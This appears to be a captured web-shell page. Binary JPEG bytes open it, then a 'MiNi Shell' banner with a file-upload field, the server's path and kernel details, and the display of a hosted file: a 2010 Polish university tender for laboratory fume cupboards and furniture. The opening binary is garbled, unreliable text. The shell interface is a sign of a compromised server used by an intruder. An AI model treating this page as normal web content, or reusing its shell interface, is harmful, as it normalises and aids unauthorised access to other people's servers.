JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101125/337019-N-2010.html

<p class="kh_header"><b>Wrocław: Dostawa i montaż mebli laboratoryjnych z podziałem na części: część I - dostawa wraz z montażem dygestorium oraz mebli laboratoryjnych; część II - dostawa i montaż mebli laboratoryjnych.  RAP 153 2010</b><br>
<b>Numer ogłoszenia: 337019 - 2010; data zamieszczenia: 25.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.up.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli laboratoryjnych z podziałem na części: część I - dostawa wraz z montażem dygestorium oraz mebli laboratoryjnych; część II - dostawa i montaż mebli laboratoryjnych.  RAP 153 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - OPIS TECHNICZNY PRZEDMIOTU ZAMÓWIENIA - 
wymagania techniczno - eksploatacyjne

Oferent musi posiadać certyfikat dla Systemu Zarządzania Jakością wg ISO 9001 2000 zaświadczający, że stosuje system zarządzania jakością zgodnie z normą w zakresie zarządzania projektami, produkcją, dostawą i serwisem mebli i urządzeń laboratoryjnych oraz dystrybucją wyposażenia laboratoryjnego.

WYMAGANE DOKUMENTY:

1.	Certyfikat zgodności z normą na dygestoria PN-EN 14175 część 2-3 wydany przez notyfikowaną jednostkę certyfikującą na terenie UE.
2.	Certyfikat zgodności z normą na stoły laboratoryjne PN-EN 13150 wydany przez notyfikowaną jednostkę certyfikującą na terenie UE.
3.	Atest PZH na blat z ceramiki monolitycznej.
4.	Atest PZH na płyty z ceramiki litej wielkogabarytowej laboratoryjnej,
5.	Atest PZH na meble laboratoryjne.
6.	Atest PZH na dygestoria.
Wyżej wymienione dokumenty należy dołączyć do dostawy.

OPIS PRZEDMIOTU ZAMÓWIENIA

1	DYGESTORIA

Dygestorium musi być urządzeniem wolnostojącym bez konieczności kotwiczenia do ścian. 
Wymiary zewnętrzne dygestorium muszą wynosić odpowiednio: 
dla dygestorium 1500 szer.1500 x gł. 850 x  wys. 2450 mm 5 proc
Wymiar blatu roboczego musi wynosić odpowiednio:
dla dygestorium 1500 mm 1435 x 695 mm  5 proc
Sposób wentylacji szczelinowy  poprzez podwójną tylną ścianę w komorze dygestoryjnej. 
Konstrukcja komory dygestoryjnej w tym ściany boczne, podwójna ściana tylna, sufit, musi być wykonana ze stali kwasoodpornej 0H18N9, nie dopuszcza się materiałów drewnopochodnych.
Przednie krawędzie ścian bocznych muszą mieć od strony komory kształt aerodynamiczny - promień zaokrąglenia minimum 25 mm. 
Wnętrze komór roboczych w tym podwójna ściana tylna muszą być pokryte chemoodporną powłoką epoksydową.
W  dygestoriach muszą być zastosowane blaty wykonane z ceramiki monolitycznej z podniesionym obrzeżem z czterech stron bez fug i łączeń. Grubość blatu musi wynosić minimum 30 mm, a z podniesionym obrzeżem minimum 37 mm. Przednia krawędź musi mieć od strony przedniej kształt aerodynamiczny - promień zaokrąglenia minimum 25 mm.
Okno dygestoryjne musi być podnoszone i opuszczane z możliwością zatrzymania w dowolnym miejscu. Okno musi być dzielone na dwa segmenty: górna część stała natomiast dolna dzielona z możliwością przesuwu w poziomie. Dolna krawędź okna musi mieć kształt aerodynamiczny. Rama okna oraz linki muszą być wykonane ze stali kwasoodpornej 0H18N9, natomiast szyby muszą być wykonane ze szkła bezpiecznego klejonego.
Dygestoria muszą posiadać  wentylowane szafki pod blatem wykonane z płyty  laminowanej o grubości 18 mm oklejone doklejką PCV 2 mm.
Dygestorium musi być wyposażone w system kontroli przepływu powietrza  w dygestorium umieszczony na panelu sterowania pod blatem roboczym oraz w mechaniczną blokadę okna na wysokości 500 mm nad blatem roboczym zgodnie z PN EN 1417.
System kontroli przepływu powietrza  musi monitorować  prędkość przepływu powietrza w dygestorium oraz sygnalizować stany pracy: w normie za pomocą zielonej diody LED i stan alarmowy, poza normą za pomocą czerwonej diody LED i alarmu akustycznego z możliwością jego wyłączenia.
Mechaniczna blokada okna przesuwnego przy ruchu okna w górę zatrzymuje okno na wysokości 500 mm nad blatem roboczym, dalszy ruch okna jest możliwy po ręcznym jej odblokowaniu. Przy ruchu okna w dół na wysokości 500 mm  nad blatem roboczym musi nastąpić automatyce załączenie blokady.
Panel sterowania mediami oraz gniazda elektryczne muszą być umieszczone pod blatem roboczym.
Króciec do podłączenia wentylacji o średnicy 200 mm.


2	STOŁY LABORATORYJNE

Stoły laboratoryjne muszą być wykonane z części stelażowej typu C, blatów zamontowanych na tych stelażach oraz szafek podwieszanych pod blatami oraz w oznaczonych miejscach nadstawki zamontowane do blatów.
Noga  C musi być wykonana z kształtownika stalowego zamkniętego o przekroju nie mniejszym niż 60x30x2 mm i musi być zaopatrzona w stopy regulacyjne umożliwiające poziomowanie stołów  oraz musi być pomalowana farbą proszkową chemoodporną w kolorze jasny popiel. Noga  C do stelaża wzmocnionego musi być wykonana z kształtownika stalowego zamkniętego o przekroju nie mniejszym niż 60x30x2 mm wzmocnionego w części przedniej pionową poprzeczką wykonaną z kształtownika stalowego zamkniętego o przekroju nie mniejszym niż 60x30x2 mm. Nadstawki muszą być wykonane z kształtownika stalowego zamkniętego o przekroju nie mniejszym niż 30x30x2 mm oraz półek wykonanych z płyty laminowanej. Wszystkie miejsca pod blatami, w których nie występują szafki laboratoryjne muszą być osłonięte maskownicami z płyty laminowanej, w taki sposób by można je było łatwo zdemontować.


3	SZAFY, SZAFKI LABORATORYJNE

Szafy, szafki laboratoryjne mają być wykonane z płyty wiórowej obustronnie laminowanej o grubości 18 mm. Wszystkie widoczne krawędzie oklejone doklejką PCV 2 mm.
Zawiasy oksydowane puszkowe z funkcją samodomykania (nie gorsze niż firmy BLUM lub równoważną.
Szuflady wykonane w systemie METABOX z systemem samodomykania.
Uchwyty wykonane z materiału chemoodpornego typu U o rozstawie 96 mm.

4	BLATY ROBOCZE I ZLEWY DO STOŁÓW LABORATORYJNYCH

Blaty z ceramiki litej z podwyższonym obrzeżem. Płaszczyzna blatów wykonana z ceramiki litej wielkogabarytowej laboratoryjnej o grubości  8 mm o wielkościach brytów nie mniejszych niż 900 x 600 mm. Podwyższenie wykonane z oryginalnej kształtki ceramicznej w tym samym kolorze co płyta. Całkowita grubość blatu  41 mm. 
Blaty z ceramiki litej bez podniesionego obrzeża. Płaszczyzna blatów wykonana z z ceramiki litej wielkogabarytowej laboratoryjnej o grubości 8 mm o wielkościach brytów nie mniejszych niż 900 x 600 mm. Całkowita grubość blatu wynosi 34 mm.
Zlewy i zlewiki ceramiczne o wymiarach określonych w specyfikacji, chemoodporne wklejane w blat do licowania powierzchni górnych.

5	ARMATURA LABORATORYJNA

Armatura laboratoryjna chemoodporna pokryta epoksydową powłoką ochronną EPS koloru
popielatego, pokrętła swoim kolorem oznaczają rodzaj danego medium zgodnie z obecnie obowiązującą normą.  

6	PRZENOŚNA SZAFA BEZPIECZEŃSTWA

Szafa ognioodporna na cztery 2,5 litrowe butelki substancji łatwopalnych,  odporność ogniowa 30 minut.
Testy na odporność ogniową przeprowadzone zgonie z normą EN 14470-1.
Wymiary zewnętrzne nie większe niż 410x410x450 mm.
Waga nie większa niż 38 kg.
Dwa uchwyty transportowe.
System wentylacji, z 2 certyfikowanymi zaworami bezpieczeństwa które zapewniają swobodną cyrkulacją powietrza i zamykają się automatycznie przy temperaturze 70°C  zgodnie z normą EN-14470-1.
Bezpieczne zamknięcie zamkiem cylindrycznym.

Część II - OPIS TECHNICZNY PRZEDMIOTU ZAMÓWIENIA - 
wymagania techniczno - eksploatacyjne

Producent mebli powinien posiadać certyfikat jakości ISO 9001 2008 w zakresie: 
- kompleksowe wyposażanie laboratoriów ochrony środowiska, mikrobiologicznych
  i technologicznych
- projektowanie, produkcja, dostawa, montaż, serwis i doradztwo w zakresie urządzeń  
  laboratoryjnych (w tym dygestoriów i mebli laboratoryjnych).

Stoły laboratoryjne powinny być wykonane  zgodnie z następującymi normami:

           PN-EN 14056 2003            Meble laboratoryjne  Zalecenia dotyczące projektowania 
                                                        i  instalacji.
           PN-EN 13150 2004            Stoły robocze dla laboratoriów.
           PN-EN 61140 2005            Ochrona przed porażeniem prądem elektrycznym - 
                                                       Wspólne aspekty  instalacji i urządzeń.
           PN-EN 60529 2003            Stopnie ochrony zapewnianej przez obudowy kod IP
           PN-EN 13792 2003            Kod barwny do oznaczania zaworów w obsłudze laboratorium.

Posiadają deklarację zgodności CE  w oparciu o Dyrektywę niskonapięciowa 73 23 EWG 
i nowelizacja 93 68 EWG.

Materiały wykorzystywane do produkcji mebli posiadają stosowne atesty higieniczne.

Wymienione dokumenty dołączyć do dostawy.

1.	Stoły laboratoryjne

Stół laboratoryjny jest elementem wyposażenia pomieszczeń laboratoryjnych.
Konstrukcja stołu zapewnia sztywność, stabilność, wytrzymałość, funkcjonalność oraz bezpieczeństwo użytkownika.  
Umożliwia zamontowanie i rozprowadzenie instalacji laboratoryjnych. 
      Stelaże stołów:  wykonane z  kształtowników stalowych 60x30x3 mm, lakierowanych proszkowo 
      atestowaną  chemoodporną farbą  poliestrową , na nóżkach o regulowanej wysokości.
      Otwarte końce kształtowników stelaży zaślepione są wkładkami z tworzywa sztucznego.

Rodzaj blatu laboratoryjnego wybranego przez użytkownika zapewnia odporność mechaniczną 
i chemiczną podana w danych technicznych blatu. 

Konstrukcja stołu zapewnia wysunięcie blatu laboratoryjnego o 1,5 - 3 cm poza krawędzie szafek laboratoryjnych.

 Proponowane blaty opcjonalnie, jak w specyfikacji

- laminat postforming 39 mm krawędzie boczne i tylna wykończone są maszynowo klejoną taśmą 
  PCV o grubości 2 mm - popielaty
- żywice fenolowe 20 mm jednostronnie laminowane np. trespa TopLab - popielaty

Wszystkie złącza i powierzchnie robocze wykonane są z materiałów, których powierzchnia nie będzie pękać, absorbować cieczy i zatrzymywać brudu.

      2.   Szafki i szafy  laboratoryjne

Wykonane są z płyty melaminowanej o grubości 18 mm.
Wszystkie krawędzie korpusu szafki wykończone są maszynowo klejoną taśmą z  PCV o grubości 2 mm.
Kolorystyka według wzornika producenta płyt laminowanych.
Zawiasy puszkowe z funkcją docisku w położeniu zamknięcia, chromowane. 
Uchwyty metalowe chromowane o rozstawie 126 - 300 mm.
Wymiary szaf i szafek - jak podano w specyfikacji. 

Szafki laboratoryjne mogą być wykonane jako
- podwieszane do konstrukcji stelaża za pomocą stalowych elementów mocujących

W wykonaniu standardowym: szuflady i/lub drzwi pełne.
Szafy wolnostojące i wiszące mogą być opcjonalnie wykonane z drzwiami przeszklonymi
(jak w specyfikacji)


3.	Nadstawki instalacyjne jak podano w specyfikacji

       Kolumnowe - wykonane z PCV o grub. 3 mm, w słupkach nadstawek mocowane są gniazda  
                                  elektryczne, sieciowe, bezpieczniki  według specyfikacji
                                  Półki  
                                  - z płyty  obustronnie laminowanej  o grub.  28 mm, krawędzie             
                                    zabezpieczone 2 mm taśmą PCV  klejoną maszynowo, 


Dopuszcza się składanie ofert równoważnych. Przez sprzęt równoważny Zamawiający rozumie sprzęt o parametrach i standardach jakościowych takich samych bądź lepszych w stosunku do sprzętu przykładowo wskazanego przez Zamawiającego. 
Na Wykonawcy spoczywa obowiązek wykazania, iż proponowany przez niego przedmiot zamówienia (dostawy) jest równoważny z opisem zawartym w SIWZ. Zamawiający za równoważny uzna sprzęt o nie gorszych właściwościach od wskazanego wzorcowo w SIWZ.
Składając ofertę równoważną Wykonawca jest zobowiązany wskazać nazwę sprzętu (typ, producenta), który oferuje oraz przedstawić w ofercie dokładny opis techniczny oferowanych zamienników, podając ich parametry techniczne w zakresie określonym w SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.18.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - tym okresie:
- dla części I - co najmniej 1 dostawę mebli laboratoryjnych o wartości minimum 50.000,00 zł brutto,
- dla części II - co najmniej 1 dostawę mebli laboratoryjnych o wartości minimum 20.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków w tym zakresie, natomiast wykonawca winien złożyć stosowne oświadczenie będące załącznikiem do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, arkusz kalkulacyjny.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza wprowadzenie istotnych zmian, do zawartej umowy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:
a)	przedłużenia terminu realizacji w następujących sytuacjach:
- zawieszenia dostaw przez zamawiającego,
- z przyczyn nieleżących po stronie Wykonawcy oraz w przypadku wystąpienia siły wyższej,
b) inne zmiany:
	 - jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
	- możliwa jest zmiana umowy w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego: możliwe jest powierzenie podwykonawcom innego zakresu dostaw niż wskazany w umowie, a także możliwa zmiana podwykonawcy na etapie realizacji dostaw,
	       - jeżeli nastąpi zmiana przepisów podatkowych, w tym wysokości podatku VAT.
2. Warunki dokonywania zmian:
a) inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
b) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
c) forma pisemna pod rygorem nieważności w formie aneksu do umowy.
    3. Wszelkie zmiany niniejszej umowy mogą być dokonywane pod rygorem nieważności jedynie 
w formie pisemnego aneksu, z podpisami upoważnionych przedstawicieli obu stron.
4. Zmiana umowy dokonana z naruszeniem powyższych zasad podlega unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl (zakładka przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza-Radeckiego 6, pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 10:30, miejsce: Uniwersytet Przyrodniczy we Wrocławiu, Sekretariat Kanclerza, ul. Mikulicza-Radeckiego 6, pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wraz z montażem dygestorium oraz mebli laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa wraz z montażem dygestorium oraz mebli laboratoryjnych dla Instytutu Inżynierii Środowiska Uniwersytetu Przyrodniczego we Wrocławiu, pl. Grunwaldzki 24, 50-363 Wrocław. Szczegółowy opis przedmiotu zamówienia - załącznik nr 7a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.18.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż mebli laboratoryjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli laboratoryjnych dla Katedry Immunologii, Patofizjologii i Prewencji Weterynaryjnej Uniwersytetu Przyrodniczego we Wrocławiu, ul. Norwida 31, 50-365 Wrocław. Szczegółowy opis przedmiotu zamówienia - załącznik nr 7b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.18.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com